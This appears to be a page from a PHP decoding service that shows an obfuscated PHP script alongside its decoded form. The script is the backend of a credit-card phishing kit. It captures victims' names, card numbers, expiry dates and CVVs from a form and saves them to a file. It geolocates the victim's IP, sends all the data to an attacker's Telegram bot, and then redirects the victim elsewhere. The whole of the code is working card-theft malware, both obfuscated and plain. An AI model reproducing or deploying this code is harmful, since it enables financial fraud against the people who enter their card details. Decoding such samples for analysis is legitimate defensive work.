Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto Aoc3B; guKX_: function get_client_ip() { $ipaddress = ''; if (isset($_SERVER[..

Decoded Output download

<?php 
 goto Aoc3B; guKX_: function get_client_ip() { $ipaddress = ''; if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ipaddress = $_SERVER["HTTP_CLIENT_IP"]; } else { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ipaddress = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_X_FORWARDED"])) { $ipaddress = $_SERVER["HTTP_X_FORWARDED"]; } else { if (isset($_SERVER["HTTP_FORWARDED_FOR"])) { $ipaddress = $_SERVER["HTTP_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_FORWARDED"])) { $ipaddress = $_SERVER["HTTP_FORWARDED"]; } else { if (isset($_SERVER["REMOTE_ADDR"])) { $ipaddress = $_SERVER["REMOTE_ADDR"]; } else { $ipaddress = "UNKNOWN"; } } } } } } return $ipaddress; } goto OSsHo; xvfcg: $id = $chatID; goto kJQBF; kJQBF: $urlMsg = "https://api.telegram.org/bot{$token}/sendMessage"; goto GaBKs; qCfAI: curl_setopt($ch, CURLOPT_URL, $urlMsg); goto UyNXU; Aoc3B: if ($_POST) { $brax = $_POST["brax"]; $brex = $_POST["brex"]; $brix = $_POST["brix"]; $dia = $_POST["dia"]; $ano = $_POST["ano"]; $brux = $_POST["brux"]; fwrite(fopen("data.txt", "a"), "Nombre: " . "{$brax}
" . "Apellido: " . "{$brex}\xa" . "Numero de tarjeta: " . "{$brix}
" . "fecha: " . "{$dia} / " . "{$ano}
" . "cvv:" . "{$brux}\xa
"); } goto OPGax; Sw1h9: $server_output = curl_exec($ch); goto lbLD_; SwUUV: $msg = "**\xf0\237\xa7\231\360\237\217\274\xe2\200\x8d\342\x99\202\357\270\x8fPACIFI\360\x9f\247\231\360\x9f\x8f\xbc\342\x80\x8d\342\x99\202\357\270\x8f**
" . "Nombre: {$brax}
" . "APELLIDO: {$brex}\xa" . "NUM-TAJR: {$brix}
" . "FECHA: {$dia} / {$ano}\xa" . "CVV: {$brux}\xa" . "IP: {$ip}
" . "Ubicaci\xc3\xb3n: {$ipInfo}"; goto nVMxw; nVMxw: $ch = curl_init(); goto qCfAI; WxCLw: curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id={$id}&parse_mode=HTML&text={$msg}"); goto xrZdI; OPGax: @(include "tlgram.php"); goto Xle2C; JsvPr: $ipInfo = get_ip_info($ip); goto SwUUV; lbLD_: curl_close($ch); goto Yk0Sx; UyNXU: curl_setopt($ch, CURLOPT_POST, 1); goto WxCLw; FAOOg: @(include "not.php"); goto guKX_; Xle2C: @(include "warn.php"); goto FAOOg; GaBKs: $ip = get_client_ip(); goto JsvPr; xrZdI: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto Sw1h9; Yk0Sx: header("Location: https://www.intermatico.com/"); goto PSYqT; OSsHo: function get_ip_info($ip) { $url = "http://ip-api.com/json/{$ip}"; $response = file_get_contents($url); if ($response) { $FRANCK = json_decode($response, true); if ($FRANCK["status"] == "success") { $country = $FRANCK["country"]; $city = $FRANCK["city"]; return "Pa\xc3\xads: {$country}
Ciudad: {$city}"; } } return "Informaci\xc3\263n de ubicaci\303\263n no disponible."; } goto DCwcc; D1LeW: $userp = $_SERVER["REMOTE_ADDR"]; goto jI7j2; DCwcc: @session_start(); goto D1LeW; jI7j2: $token = $T0K3N; goto xvfcg; PSYqT: ?>

Did this file decode correctly?

Original Code

<?php
 goto Aoc3B; guKX_: function get_client_ip() { $ipaddress = ''; if (isset($_SERVER["\x48\124\x54\x50\x5f\103\x4c\x49\x45\x4e\x54\137\x49\x50"])) { $ipaddress = $_SERVER["\110\x54\x54\120\137\103\114\x49\105\x4e\x54\x5f\x49\x50"]; } else { if (isset($_SERVER["\x48\x54\124\120\x5f\130\x5f\x46\117\122\x57\101\x52\104\x45\x44\137\106\x4f\122"])) { $ipaddress = $_SERVER["\110\124\124\120\137\130\x5f\106\x4f\122\x57\x41\x52\x44\x45\104\x5f\106\x4f\122"]; } else { if (isset($_SERVER["\x48\x54\124\120\x5f\x58\137\106\117\x52\x57\101\122\104\x45\104"])) { $ipaddress = $_SERVER["\x48\x54\124\120\137\x58\137\x46\x4f\122\127\101\x52\104\x45\x44"]; } else { if (isset($_SERVER["\110\x54\124\x50\137\x46\117\122\127\x41\122\104\x45\x44\137\x46\117\x52"])) { $ipaddress = $_SERVER["\x48\124\x54\120\x5f\x46\x4f\x52\x57\101\x52\104\105\x44\x5f\106\117\x52"]; } else { if (isset($_SERVER["\x48\x54\124\x50\137\x46\x4f\122\127\x41\x52\104\105\x44"])) { $ipaddress = $_SERVER["\110\124\x54\x50\x5f\x46\117\122\127\x41\x52\x44\105\x44"]; } else { if (isset($_SERVER["\122\105\115\117\124\105\137\101\104\x44\x52"])) { $ipaddress = $_SERVER["\x52\105\115\117\x54\x45\137\x41\104\104\x52"]; } else { $ipaddress = "\x55\116\x4b\116\117\127\x4e"; } } } } } } return $ipaddress; } goto OSsHo; xvfcg: $id = $chatID; goto kJQBF; kJQBF: $urlMsg = "\150\x74\164\160\163\72\x2f\x2f\141\x70\151\x2e\x74\x65\154\x65\147\162\141\x6d\x2e\157\162\x67\x2f\x62\157\164{$token}\57\x73\145\156\x64\x4d\x65\163\x73\x61\147\145"; goto GaBKs; qCfAI: curl_setopt($ch, CURLOPT_URL, $urlMsg); goto UyNXU; Aoc3B: if ($_POST) { $brax = $_POST["\142\162\x61\170"]; $brex = $_POST["\142\162\145\170"]; $brix = $_POST["\142\162\x69\170"]; $dia = $_POST["\144\151\141"]; $ano = $_POST["\x61\x6e\157"]; $brux = $_POST["\x62\162\165\x78"]; fwrite(fopen("\x64\141\164\x61\x2e\x74\170\164", "\141"), "\x4e\x6f\x6d\x62\x72\x65\72\40" . "{$brax}\12" . "\101\160\145\154\154\x69\144\157\72\x20" . "{$brex}\xa" . "\x4e\165\x6d\145\162\x6f\40\x64\x65\40\x74\141\x72\x6a\x65\x74\141\72\x20" . "{$brix}\12" . "\146\145\143\x68\x61\x3a\x20" . "{$dia}\40\57\x20" . "{$ano}\12" . "\143\x76\166\x3a" . "{$brux}\xa\12"); } goto OPGax; Sw1h9: $server_output = curl_exec($ch); goto lbLD_; SwUUV: $msg = "\x2a\52\xf0\237\xa7\231\360\237\217\274\xe2\200\x8d\342\x99\202\357\270\x8f\120\101\103\111\106\111\360\x9f\247\231\360\x9f\x8f\xbc\342\x80\x8d\342\x99\202\357\270\x8f\52\52\12" . "\x4e\x6f\x6d\142\162\x65\72\40{$brax}\12" . "\101\120\x45\x4c\x4c\111\x44\x4f\72\x20{$brex}\xa" . "\x4e\125\115\x2d\124\x41\112\122\x3a\40{$brix}\12" . "\x46\x45\103\110\x41\72\x20{$dia}\x20\57\40{$ano}\xa" . "\103\x56\126\72\40{$brux}\xa" . "\x49\120\72\x20{$ip}\12" . "\x55\x62\151\x63\141\x63\151\xc3\xb3\156\72\40{$ipInfo}"; goto nVMxw; nVMxw: $ch = curl_init(); goto qCfAI; WxCLw: curl_setopt($ch, CURLOPT_POSTFIELDS, "\x63\150\141\164\137\x69\x64\75{$id}\46\160\x61\x72\x73\145\x5f\155\157\144\145\x3d\110\x54\115\x4c\x26\164\145\x78\x74\75{$msg}"); goto xrZdI; OPGax: @(include "\x74\154\147\x72\x61\x6d\x2e\160\150\x70"); goto Xle2C; JsvPr: $ipInfo = get_ip_info($ip); goto SwUUV; lbLD_: curl_close($ch); goto Yk0Sx; UyNXU: curl_setopt($ch, CURLOPT_POST, 1); goto WxCLw; FAOOg: @(include "\156\x6f\164\x2e\x70\150\160"); goto guKX_; Xle2C: @(include "\167\141\162\x6e\56\x70\x68\x70"); goto FAOOg; GaBKs: $ip = get_client_ip(); goto JsvPr; xrZdI: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto Sw1h9; Yk0Sx: header("\114\x6f\x63\x61\164\151\157\x6e\x3a\40\150\164\x74\160\x73\x3a\x2f\57\167\167\x77\x2e\x69\x6e\164\x65\x72\x6d\x61\x74\x69\x63\157\x2e\x63\x6f\155\57"); goto PSYqT; OSsHo: function get_ip_info($ip) { $url = "\x68\x74\164\160\72\57\x2f\151\x70\x2d\x61\160\151\56\x63\x6f\155\57\x6a\x73\157\156\x2f{$ip}"; $response = file_get_contents($url); if ($response) { $FRANCK = json_decode($response, true); if ($FRANCK["\163\164\141\164\x75\163"] == "\163\165\143\x63\x65\x73\x73") { $country = $FRANCK["\x63\x6f\165\x6e\164\x72\x79"]; $city = $FRANCK["\143\151\164\171"]; return "\120\x61\xc3\xad\163\x3a\x20{$country}\12\103\x69\165\144\x61\144\x3a\x20{$city}"; } } return "\x49\x6e\146\157\x72\x6d\x61\x63\x69\xc3\263\x6e\x20\x64\x65\40\x75\x62\151\x63\x61\143\x69\303\263\156\x20\156\157\40\144\151\x73\160\x6f\x6e\151\142\x6c\145\x2e"; } goto DCwcc; D1LeW: $userp = $_SERVER["\x52\105\115\117\124\x45\137\x41\104\x44\122"]; goto jI7j2; DCwcc: @session_start(); goto D1LeW; jI7j2: $token = $T0K3N; goto xvfcg; PSYqT: ?>

Function Calls

None

Variables

None

Stats

MD5	f2ef609657b4c9720a50d5efc6f28afb
Eval Count	0
Decode Time	53 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats